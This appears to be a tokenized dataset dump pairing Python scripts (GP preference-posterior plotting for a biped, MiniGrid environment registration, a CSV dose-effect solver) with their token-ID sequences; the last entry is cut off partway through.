content
stringlengths 1
1.04M
| input_ids
sequencelengths 1
774k
| ratio_char_token
float64 0.38
22.9
| token_count
int64 1
774k
|
---|---|---|---|
# -*- coding: utf-8 -*-
"""
For the ICRA video, we made some animations of how the preference model
posteriors evolve after each iteration. This script saves the stack of images
to make such an animation for the compass-gait biped's model posterior. For
every iteration, we save an image of the model posterior from one of the CG
biped simulation runs.
"""
import numpy as np
import scipy.io as io
import os
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'font.size': 18})
from Preference_GP_learning import feedback
# SET THE FOLLOWING FLAG TO EITHER TRUE OR FALSE, DEPENDING ON WHETHER THE
# MODEL POSTERIOR INFORMATION FOR ALL RUNS HAS ALREADY BEEN SAVED. If the
# posterior information is already computed and saved, setting this to True
# will save runtime. If you try setting this to True but the information is not
# saved, then you will get an error. If you set this to False, then all of the
# necessary information will be saved, such that you can set this to True if
# running this script ever again.
posterior_already_computed = True
# Folder for saving plots:
save_plots_folder = 'Plots/CG_biped_animation_plots/'
if not os.path.isdir(save_plots_folder):
os.makedirs(save_plots_folder)
# Folder for saving (or loading) posterior information:
save_info_folder = 'Plotting_data/CG_biped_sim_posteriors/'
if not os.path.isdir(save_info_folder):
os.makedirs(save_info_folder)
# Load data to use for plotting evolution of the posterior:
CG_sim_folder = 'Compass_biped_results/'
run_num = 0
num_samples = 2 # CoSpar parameter (n)
num_pts_sample = 24 # Number of points in input domain
data = io.loadmat(CG_sim_folder + 'Opt_' + str(num_samples) + '_samples_' \
+ str(num_pts_sample) + '_pts_run_' + str(run_num) + \
'.mat')
data_pt_idxs = data['data_pt_idxs'] # Data: points alg. selected in simulation
pref_nums = data_pt_idxs.shape[0]
# Domain over which learning occurred:
points_to_sample = np.linspace(0.08, 0.18, num_pts_sample)
# Determine dimensionality of state space:
if len(points_to_sample.shape) == 1:
state_dim = 1
else:
state_dim = points_to_sample.shape[1]
if not posterior_already_computed:
points_to_sample = points_to_sample.reshape((num_pts_sample, state_dim))
# Load preference labels and GP model hyperparameters:
labels = data['labels']
preference_noise = data['preference_noise'][0][0]
lengthscales = data['lengthscale'][0]
signal_variance = data['signal_variance'][0][0]
GP_noise_var = data['GP_noise_var'][0][0]
# Instantiate the prior covariance matrix, using a squared exponential
# kernel in each dimension of the input space:
GP_prior_cov = signal_variance * np.ones((num_pts_sample, num_pts_sample))
for i in range(num_pts_sample):
pt1 = points_to_sample[i, :]
for j in range(num_pts_sample):
pt2 = points_to_sample[j, :]
for dim in range(state_dim):
lengthscale = lengthscales[dim]
if lengthscale > 0:
GP_prior_cov[i, j] *= np.exp(-0.5 * ((pt2[dim] - pt1[dim]) / \
lengthscale)**2)
elif lengthscale == 0 and pt1[dim] != pt2[dim]:
GP_prior_cov[i, j] = 0
GP_prior_cov += GP_noise_var * np.eye(num_pts_sample)
GP_prior_cov_inv = np.linalg.inv(GP_prior_cov)
points_to_sample = points_to_sample.flatten()
# Make a plot for each iteration of the algorithm.
for pref_num in range(pref_nums + 1):
print('Iter %i of %i' % (pref_num, pref_nums))
# Get model posterior to use for this plot:
if not posterior_already_computed:
# Preference data at this iteration:
X = data_pt_idxs[: pref_num, :]
y = labels[: pref_num, 1]
# Update the Gaussian process preference model:
posterior_model = feedback(X, y, GP_prior_cov_inv, preference_noise)
# Unpack model posterior:
post_mean = posterior_model['mean']
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals']
else:
posterior_model = io.loadmat(save_info_folder + 'Compass_biped_' + \
str(pref_num) + '_preferences.mat')
# Unpack model posterior:
post_mean = posterior_model['post_mean'].flatten()
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals'].flatten()
# Construct posterior covariance matrix:
post_cov = cov_evecs @ np.diag(cov_evals) @ np.linalg.inv(cov_evecs)
# Posterior standard deviation at each point:
post_stdev = np.sqrt(np.diag(post_cov))
# Without title, used (8, 6). (8, 6.3) keeps the actual plot the same size
# while adding a title.
plt.figure(figsize = (8, 6.3))
# Plot posterior mean and standard deviation:
plt.plot(points_to_sample, post_mean, color = 'blue', linewidth = 3)
plt.fill_between(points_to_sample, post_mean - 2*post_stdev,
post_mean + 2*post_stdev, alpha = 0.3, color = 'blue')
plt.ylim([-0.035, 0.043])
plt.xlabel('Step length (m)')
plt.ylabel('Posterior Utility')
plt.title('Number of Trials: ' + str(pref_num * 2))
plt.xticks([0.08, 0.13, 0.18])
plt.yticks([-0.02, 0, 0.02, 0.04])
plt.tight_layout()
if not posterior_already_computed:
# Save information about posterior:
io.savemat(save_info_folder + 'Compass_biped_' + str(pref_num) + \
'_preferences.mat', {'post_mean': post_mean,
'cov_evecs': cov_evecs,
'cov_evals': cov_evals})
# Save plot:
plt.savefig(save_plots_folder + 'Compass_biped_2STD_' + str(pref_num) + \
'_preferences_titled.png')
plt.close('all')
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
1890,
262,
12460,
3861,
2008,
11,
356,
925,
617,
22407,
286,
703,
262,
12741,
2746,
220,
198,
79,
6197,
12706,
18101,
706,
1123,
24415,
13,
770,
4226,
16031,
262,
8931,
286,
4263,
198,
1462,
787,
884,
281,
11034,
329,
262,
31855,
12,
70,
4548,
14141,
276,
338,
2746,
34319,
13,
1114,
220,
198,
16833,
24415,
11,
356,
3613,
281,
2939,
286,
262,
2746,
34319,
422,
530,
286,
262,
29925,
220,
198,
65,
46647,
18640,
4539,
13,
198,
37811,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
629,
541,
88,
13,
952,
355,
33245,
198,
11748,
28686,
198,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
6738,
2603,
29487,
8019,
1330,
48321,
10044,
4105,
198,
6015,
10044,
4105,
13,
19119,
15090,
6,
10331,
13,
7857,
10354,
1248,
30072,
198,
198,
6738,
3771,
4288,
62,
16960,
62,
40684,
1330,
7538,
220,
220,
220,
220,
198,
198,
2,
25823,
3336,
11895,
44765,
2751,
9977,
4760,
5390,
412,
10554,
1137,
26751,
6375,
26563,
11,
5550,
47,
10619,
2751,
6177,
7655,
2767,
16879,
3336,
198,
2,
19164,
3698,
24582,
1137,
41254,
38044,
7473,
11096,
32494,
50,
33930,
8355,
15675,
56,
9348,
1677,
311,
10116,
1961,
13,
1002,
262,
198,
2,
34319,
1321,
318,
1541,
29231,
290,
7448,
11,
4634,
428,
284,
6407,
198,
2,
481,
3613,
19124,
13,
1002,
345,
1949,
4634,
428,
284,
6407,
475,
262,
1321,
318,
407,
198,
2,
7448,
11,
788,
345,
481,
651,
281,
4049,
13,
1002,
345,
900,
428,
284,
10352,
11,
788,
477,
286,
262,
220,
198,
2,
3306,
1321,
481,
307,
7448,
11,
884,
326,
345,
460,
900,
428,
284,
6407,
611,
198,
2,
2491,
428,
4226,
1683,
757,
13,
198,
79,
6197,
1504,
62,
282,
1493,
62,
785,
17128,
796,
6407,
198,
198,
2,
48107,
329,
8914,
21528,
25,
198,
21928,
62,
489,
1747,
62,
43551,
796,
705,
3646,
1747,
14,
39816,
62,
65,
46647,
62,
11227,
341,
62,
489,
1747,
14,
6,
198,
198,
361,
407,
28686,
13,
6978,
13,
9409,
343,
7,
21928,
62,
489,
1747,
62,
43551,
2599,
198,
220,
220,
220,
28686,
13,
76,
4335,
17062,
7,
21928,
62,
489,
1747,
62,
43551,
8,
198,
198,
2,
48107,
329,
8914,
357,
273,
11046,
8,
34319,
1321,
25,
198,
21928,
62,
10951,
62,
43551,
796,
705,
43328,
889,
62,
7890,
14,
39816,
62,
65,
46647,
62,
14323,
62,
79,
6197,
12706,
14,
6,
198,
198,
361,
407,
28686,
13,
6978,
13,
9409,
343,
7,
21928,
62,
10951,
62,
43551,
2599,
198,
220,
220,
220,
28686,
13,
76,
4335,
17062,
7,
21928,
62,
10951,
62,
43551,
8,
198,
198,
2,
8778,
1366,
284,
779,
329,
29353,
6954,
286,
262,
34319,
25,
220,
220,
220,
198,
39816,
62,
14323,
62,
43551,
796,
705,
7293,
562,
62,
65,
46647,
62,
43420,
14,
6,
198,
198,
5143,
62,
22510,
796,
657,
198,
22510,
62,
82,
12629,
796,
362,
220,
220,
220,
220,
220,
1303,
1766,
50,
1845,
11507,
357,
77,
8,
198,
22510,
62,
457,
82,
62,
39873,
796,
1987,
220,
1303,
7913,
286,
2173,
287,
5128,
7386,
198,
198,
7890,
796,
33245,
13,
2220,
6759,
7,
39816,
62,
14323,
62,
43551,
1343,
705,
27871,
62,
6,
1343,
965,
7,
22510,
62,
82,
12629,
8,
1343,
705,
62,
82,
12629,
62,
6,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1343,
965,
7,
22510,
62,
457,
82,
62,
39873,
8,
1343,
705,
62,
457,
82,
62,
5143,
62,
6,
1343,
965,
7,
5143,
62,
22510,
8,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45302,
6759,
11537,
198,
198,
7890,
62,
457,
62,
312,
34223,
796,
1366,
17816,
7890,
62,
457,
62,
312,
34223,
20520,
220,
1303,
6060,
25,
2173,
435,
70,
13,
6163,
287,
18640,
198,
3866,
69,
62,
77,
5700,
796,
1366,
62,
457,
62,
312,
34223,
13,
43358,
58,
15,
60,
198,
198,
2,
20021,
625,
543,
4673,
5091,
25,
198,
13033,
62,
1462,
62,
39873,
796,
45941,
13,
21602,
10223,
7,
15,
13,
2919,
11,
657,
13,
1507,
11,
997,
62,
457,
82,
62,
39873,
8,
198,
198,
2,
45559,
3810,
15793,
1483,
286,
1181,
2272,
25,
198,
361,
18896,
7,
13033,
62,
1462,
62,
39873,
13,
43358,
8,
6624,
352,
25,
198,
220,
220,
220,
1181,
62,
27740,
796,
352,
220,
220,
198,
17772,
25,
198,
220,
220,
220,
1181,
62,
27740,
796,
2173,
62,
1462,
62,
39873,
13,
43358,
58,
16,
60,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
198,
361,
407,
34319,
62,
282,
1493,
62,
785,
17128,
25,
220,
220,
220,
220,
198,
220,
220,
220,
220,
198,
220,
220,
220,
2173,
62,
1462,
62,
39873,
796,
2173,
62,
1462,
62,
39873,
13,
3447,
1758,
19510,
22510,
62,
457,
82,
62,
39873,
11,
1181,
62,
27740,
4008,
628,
220,
220,
220,
1303,
8778,
12741,
14722,
290,
14714,
2746,
8718,
17143,
7307,
25,
198,
220,
220,
220,
14722,
796,
1366,
17816,
23912,
1424,
20520,
198,
220,
220,
220,
12741,
62,
3919,
786,
796,
1366,
17816,
3866,
4288,
62,
3919,
786,
6,
7131,
15,
7131,
15,
60,
198,
220,
220,
220,
4129,
1416,
2040,
796,
1366,
17816,
13664,
9888,
6,
7131,
15,
60,
198,
220,
220,
220,
6737,
62,
25641,
590,
796,
1366,
17816,
12683,
282,
62,
25641,
590,
6,
7131,
15,
7131,
15,
60,
198,
220,
220,
220,
14714,
62,
3919,
786,
62,
7785,
796,
1366,
17816,
16960,
62,
3919,
786,
62,
7785,
6,
7131,
15,
7131,
15,
60,
628,
220,
220,
220,
1303,
24470,
9386,
262,
3161,
44829,
590,
17593,
11,
1262,
257,
44345,
39682,
198,
220,
220,
220,
1303,
9720,
287,
1123,
15793,
286,
262,
5128,
2272,
25,
198,
220,
220,
220,
14714,
62,
3448,
273,
62,
66,
709,
796,
220,
6737,
62,
25641,
590,
1635,
45941,
13,
1952,
19510,
22510,
62,
457,
82,
62,
39873,
11,
997,
62,
457,
82,
62,
39873,
4008,
220,
220,
220,
198,
220,
220,
220,
220,
198,
220,
220,
220,
329,
1312,
287,
2837,
7,
22510,
62,
457,
82,
62,
39873,
2599,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
42975,
16,
796,
2173,
62,
1462,
62,
39873,
58,
72,
11,
1058,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
329,
474,
287,
2837,
7,
22510,
62,
457,
82,
62,
39873,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
42975,
17,
796,
2173,
62,
1462,
62,
39873,
58,
73,
11,
1058,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
5391,
287,
2837,
7,
5219,
62,
27740,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4129,
9888,
796,
4129,
1416,
2040,
58,
27740,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
4129,
9888,
1875,
657,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14714,
62,
3448,
273,
62,
66,
709,
58,
72,
11,
474,
60,
1635,
28,
45941,
13,
11201,
32590,
15,
13,
20,
1635,
14808,
457,
17,
58,
27740,
60,
532,
42975,
16,
58,
27740,
12962,
1220,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4129,
9888,
8,
1174,
17,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
4129,
9888,
6624,
657,
290,
42975,
16,
58,
27740,
60,
14512,
42975,
17,
58,
27740,
5974,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14714,
62,
3448,
273,
62,
66,
709,
58,
72,
11,
474,
60,
796,
657,
198,
220,
220,
220,
220,
220,
198,
220,
220,
220,
14714,
62,
3448,
273,
62,
66,
709,
15853,
14714,
62,
3919,
786,
62,
7785,
1635,
45941,
13,
25379,
7,
22510,
62,
457,
82,
62,
39873,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
14714,
62,
3448,
273,
62,
66,
709,
62,
16340,
796,
45941,
13,
75,
1292,
70,
13,
16340,
7,
16960,
62,
3448,
273,
62,
66,
709,
8,
628,
220,
220,
220,
2173,
62,
1462,
62,
39873,
796,
2173,
62,
1462,
62,
39873,
13,
2704,
41769,
3419,
198,
198,
2,
6889,
257,
7110,
329,
1123,
24415,
286,
262,
11862,
13,
198,
1640,
7694,
62,
22510,
287,
2837,
7,
3866,
69,
62,
77,
5700,
1343,
352,
2599,
198,
220,
220,
220,
220,
198,
220,
220,
220,
3601,
10786,
29993,
4064,
72,
286,
4064,
72,
6,
4064,
357,
3866,
69,
62,
22510,
11,
7694,
62,
77,
5700,
4008,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
2746,
34319,
284,
779,
329,
428,
7110,
25,
198,
220,
220,
220,
611,
407,
34319,
62,
282,
1493,
62,
785,
17128,
25,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3771,
4288,
1366,
379,
428,
24415,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1395,
796,
1366,
62,
457,
62,
312,
34223,
58,
25,
7694,
62,
22510,
11,
1058,
60,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
14722,
58,
25,
7694,
62,
22510,
11,
352,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
10133,
262,
12822,
31562,
1429,
12741,
2746,
25,
198,
220,
220,
220,
220,
220,
220,
220,
34319,
62,
19849,
796,
7538,
7,
55,
11,
331,
11,
14714,
62,
3448,
273,
62,
66,
709,
62,
16340,
11,
12741,
62,
3919,
786,
8,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
791,
8002,
2746,
34319,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1281,
62,
32604,
796,
34319,
62,
19849,
17816,
32604,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
39849,
62,
44655,
6359,
796,
45941,
13,
5305,
7,
79,
6197,
1504,
62,
19849,
17816,
66,
709,
62,
44655,
6359,
6,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
39849,
62,
1990,
874,
796,
34319,
62,
19849,
17816,
66,
709,
62,
1990,
874,
20520,
198,
220,
220,
220,
220,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
34319,
62,
19849,
796,
33245,
13,
2220,
6759,
7,
21928,
62,
10951,
62,
43551,
1343,
705,
7293,
562,
62,
65,
46647,
62,
6,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
965,
7,
3866,
69,
62,
22510,
8,
1343,
705,
62,
3866,
69,
4972,
13,
6759,
11537,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
791,
8002,
2746,
34319,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1281,
62,
32604,
796,
34319,
62,
19849,
17816,
7353,
62,
32604,
6,
4083,
2704,
41769,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
39849,
62,
44655,
6359,
796,
45941,
13,
5305,
7,
79,
6197,
1504,
62,
19849,
17816,
66,
709,
62,
44655,
6359,
6,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
39849,
62,
1990,
874,
796,
34319,
62,
19849,
17816,
66,
709,
62,
1990,
874,
6,
4083,
2704,
41769,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
28407,
34319,
44829,
590,
17593,
25,
198,
220,
220,
220,
1281,
62,
66,
709,
796,
39849,
62,
44655,
6359,
2488,
45941,
13,
10989,
363,
7,
66,
709,
62,
1990,
874,
8,
2488,
45941,
13,
75,
1292,
70,
13,
16340,
7,
66,
709,
62,
44655,
6359,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
44996,
1504,
3210,
28833,
379,
1123,
966,
25,
198,
220,
220,
220,
1281,
62,
301,
7959,
796,
45941,
13,
31166,
17034,
7,
37659,
13,
10989,
363,
7,
7353,
62,
66,
709,
4008,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
9170,
3670,
11,
973,
357,
23,
11,
718,
737,
357,
23,
11,
718,
13,
18,
8,
7622,
262,
4036,
7110,
262,
976,
2546,
198,
220,
220,
220,
1303,
981,
4375,
257,
3670,
13,
198,
220,
220,
220,
458,
83,
13,
26875,
7,
5647,
7857,
796,
357,
23,
11,
718,
13,
18,
4008,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
28114,
34319,
1612,
290,
3210,
28833,
25,
198,
220,
220,
220,
458,
83,
13,
29487,
7,
13033,
62,
1462,
62,
39873,
11,
1281,
62,
32604,
11,
3124,
796,
705,
17585,
3256,
9493,
413,
5649,
796,
513,
8,
198,
220,
220,
220,
458,
83,
13,
20797,
62,
23395,
7,
13033,
62,
1462,
62,
39873,
11,
1281,
62,
32604,
532,
362,
9,
7353,
62,
301,
7959,
11,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1281,
62,
32604,
1343,
362,
9,
7353,
62,
301,
7959,
11,
17130,
796,
657,
13,
18,
11,
3124,
796,
705,
17585,
11537,
628,
220,
220,
220,
458,
83,
13,
88,
2475,
26933,
12,
15,
13,
44215,
11,
657,
13,
48768,
12962,
198,
220,
220,
220,
220,
198,
220,
220,
220,
458,
83,
13,
87,
18242,
10786,
8600,
4129,
357,
76,
8,
11537,
198,
220,
220,
220,
458,
83,
13,
2645,
9608,
10786,
47,
6197,
1504,
34030,
11537,
198,
220,
220,
220,
458,
83,
13,
7839,
10786,
15057,
286,
28945,
25,
705,
1343,
965,
7,
3866,
69,
62,
22510,
1635,
362,
4008,
198,
220,
220,
220,
220,
198,
220,
220,
220,
458,
83,
13,
742,
3378,
26933,
15,
13,
2919,
11,
657,
13,
1485,
11,
657,
13,
1507,
12962,
198,
220,
220,
220,
458,
83,
13,
20760,
3378,
26933,
12,
15,
13,
2999,
11,
657,
11,
657,
13,
2999,
11,
657,
13,
3023,
12962,
198,
220,
220,
220,
458,
83,
13,
33464,
62,
39786,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
611,
407,
34319,
62,
282,
1493,
62,
785,
17128,
25,
220,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
12793,
1321,
546,
34319,
25,
198,
220,
220,
220,
220,
220,
220,
220,
33245,
13,
21928,
6759,
7,
21928,
62,
10951,
62,
43551,
1343,
705,
7293,
562,
62,
65,
46647,
62,
6,
1343,
965,
7,
3866,
69,
62,
22510,
8,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
3866,
69,
4972,
13,
6759,
3256,
1391,
6,
7353,
62,
32604,
10354,
1281,
62,
32604,
11,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
709,
62,
44655,
6359,
10354,
39849,
62,
44655,
6359,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
709,
62,
1990,
874,
10354,
39849,
62,
1990,
874,
30072,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
12793,
7110,
25,
198,
220,
220,
220,
458,
83,
13,
21928,
5647,
7,
21928,
62,
489,
1747,
62,
43551,
1343,
705,
7293,
562,
62,
65,
46647,
62,
17,
32147,
62,
6,
1343,
965,
7,
3866,
69,
62,
22510,
8,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
3866,
69,
4972,
62,
83,
7803,
13,
11134,
11537,
198,
220,
220,
220,
220,
198,
220,
220,
220,
458,
83,
13,
19836,
10786,
439,
11537,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220
] | 2.200498 | 2,813 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
from gym_minigrid.wrappers import RGBImgPartialObsWrapper
from gym_minigrid.wrappers import FrameStack
from collections import deque
from gym.spaces import Box
from gym import Wrapper
import numpy as np
import random
register(
id='MiniGrid-FourRoomsMemory-v0',
entry_point='gym_minigrid.envs:FourRoomsMemoryEnv'
)
register(
id='MiniGrid-FourRoomsMemoryRGB-v0',
entry_point='gym_minigrid.envs:rgb_env'
)
register(
id='MiniGrid-FourRoomsMemoryStacked-v0',
entry_point='gym_minigrid.envs:frame_stack_env'
)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
11550,
62,
1084,
3692,
312,
13,
1084,
3692,
312,
1330,
1635,
198,
6738,
11550,
62,
1084,
3692,
312,
13,
30238,
1330,
7881,
198,
6738,
11550,
62,
1084,
3692,
312,
13,
29988,
11799,
1330,
34359,
3483,
11296,
7841,
498,
31310,
36918,
2848,
198,
6738,
11550,
62,
1084,
3692,
312,
13,
29988,
11799,
1330,
25184,
25896,
198,
6738,
17268,
1330,
390,
4188,
198,
6738,
11550,
13,
2777,
2114,
1330,
8315,
198,
6738,
11550,
1330,
27323,
2848,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
4738,
628,
198,
30238,
7,
198,
220,
220,
220,
4686,
11639,
39234,
41339,
12,
15137,
15450,
3150,
30871,
12,
85,
15,
3256,
198,
220,
220,
220,
5726,
62,
4122,
11639,
1360,
76,
62,
1084,
3692,
312,
13,
268,
14259,
25,
15137,
15450,
3150,
30871,
4834,
85,
6,
198,
8,
198,
198,
30238,
7,
198,
220,
220,
220,
4686,
11639,
39234,
41339,
12,
15137,
15450,
3150,
30871,
36982,
12,
85,
15,
3256,
198,
220,
220,
220,
5726,
62,
4122,
11639,
1360,
76,
62,
1084,
3692,
312,
13,
268,
14259,
25,
81,
22296,
62,
24330,
6,
198,
8,
198,
198,
30238,
7,
198,
220,
220,
220,
4686,
11639,
39234,
41339,
12,
15137,
15450,
3150,
30871,
1273,
6021,
12,
85,
15,
3256,
198,
220,
220,
220,
5726,
62,
4122,
11639,
1360,
76,
62,
1084,
3692,
312,
13,
268,
14259,
25,
14535,
62,
25558,
62,
24330,
6,
198,
8,
198
] | 2.600791 | 253 |
# to run open terminal window in location then type 'python "scriptname.py" "filename.csv" ' - "" indicates that these portions are replaced with actual file names
# import necessary libraries
import csv
import sys
import math
# read in the file & convert "that memory" into a csv read file
f = open(sys.argv[1],'rb')
r = csv.reader(f)
# start at row 0 (first row)
i = 0
rows = []
for row in r:
#adds an array to the list of arrays (arrays = list of variables); rows = list of lists, aka a 2D array -> defining the layout of spreadsheet
rows.append([])
#look at columns, but only for the current row
for col in row:
rows[i].append(col)
# look at row 1, then row 2, then row 3....
i+=1
answers = []
m1 = float(rows[2][11])
m2 = float(rows[2][11])
Fa1A = float(rows[2][11])
Fa1B = float(rows[2][11])
Fa2A = float(rows[2][11])
Fa2B = float(rows[2][11])
#m constant for each experiment (does not change w/ dilutions - slope from linear regressions of log(Fa/Fu) v log(Dose) )
#notation: 1A = 1.1, 1B = 1.2, 2A = 2.1, 2B = 2.2
for row in xrange(2,12):
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2A = float(rows[row][12])
Fu1A = 1-Fa1A
Fu2A = 1-Fa2A
rows[row][14] = equation_solver_wrapper(Fa1A, Fu1A, Fa2A, Fu2A, m1, m2)
rows[row][18] = 1 - rows[row][14]
rows[row][22] = math.log(rows[row][18]/rows[row][14] ,10)
except:
rows[row][14] = "DNE"
rows[row][18] = "DNE"
rows[row][22] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2B = float(rows[row][13])
Fu1A = 1-Fa1A
Fu2B = 1-Fa2B
rows[row][15] = equation_solver_wrapper(Fa1A, Fu1A, Fa2B, Fu2B, m1, m2)
rows[row][19] = 1 - rows[row][15]
rows[row][23] = math.log(rows[row][19]/rows[row][15],10)
except Exception as e:
rows[row][15] = "DNE"
rows[row][19] = "DNE"
rows[row][23] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2A = float(rows[row][12])
Fu1B = 1-Fa1B
Fu2A = 1-Fa2A
#guess Fu
rows[row][16] = equation_solver_wrapper(Fa1B, Fu1B, Fa2A, Fu2A, m1, m2)
#guess Fa
rows[row][20] = 1 - rows[row][16]
#guess inhib
rows[row][24] = math.log(rows[row][20]/rows[row][16],10)
except:
rows[row][16] = "DNE"
rows[row][20] = "DNE"
rows[row][24] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2B = float(rows[row][13])
Fu1B = 1-Fa1B
Fu2B = 1-Fa2B
rows[row][17] = equation_solver_wrapper(Fa1B, Fu1B, Fa2B, Fu2B, m1, m2)
rows[row][21] = 1 - rows[row][17]
rows[row][25] = math.log(rows[row][21]/rows[row][17],10)
except:
rows[row][17] = "DNE"
rows[row][21] = "DNE"
rows[row][25] = "DNE"
with open(sys.argv[2], "wb") as f:
writer = csv.writer(f)
writer.writerows(rows) | [
2,
284,
1057,
1280,
12094,
4324,
287,
4067,
788,
2099,
705,
29412,
366,
12048,
3672,
13,
9078,
1,
366,
34345,
13,
40664,
1,
705,
532,
13538,
9217,
326,
777,
16690,
389,
6928,
351,
4036,
2393,
3891,
198,
198,
2,
1330,
3306,
12782,
198,
11748,
269,
21370,
198,
11748,
25064,
220,
198,
11748,
10688,
198,
198,
2,
1100,
287,
262,
2393,
1222,
10385,
366,
5562,
4088,
1,
656,
257,
269,
21370,
1100,
2393,
198,
69,
796,
1280,
7,
17597,
13,
853,
85,
58,
16,
60,
4032,
26145,
11537,
198,
81,
796,
269,
21370,
13,
46862,
7,
69,
8,
628,
198,
198,
2,
923,
379,
5752,
657,
357,
11085,
5752,
8,
198,
72,
796,
657,
198,
8516,
796,
17635,
198,
198,
1640,
5752,
287,
374,
25,
198,
197,
2,
2860,
82,
281,
7177,
284,
262,
1351,
286,
26515,
357,
3258,
592,
796,
1351,
286,
9633,
1776,
15274,
796,
1351,
286,
8341,
11,
22430,
257,
362,
35,
7177,
4613,
16215,
262,
12461,
286,
30117,
198,
197,
8516,
13,
33295,
